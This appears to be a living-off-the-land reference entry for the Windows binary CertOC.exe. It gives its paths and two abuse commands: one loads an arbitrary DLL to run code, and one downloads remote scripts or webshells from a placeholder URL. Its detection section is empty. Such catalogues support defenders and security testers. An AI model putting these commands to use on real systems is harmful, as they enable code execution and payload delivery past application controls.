CertOC.exe

Used for installing certificates

Paths

  • c:\windows\system32\certoc.exe
  • c:\windows\syswow64\certoc.exe

Commands

Execute

Loads the target DLL file

Use case: Execute code within DLL file

Privileges: User

certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}

Download

Downloads text formatted files

Use case: Download scripts, webshells etc.

Privileges: User

certoc.exe -GetCACAPS {REMOTEURL:.ps1}

Detection

Resources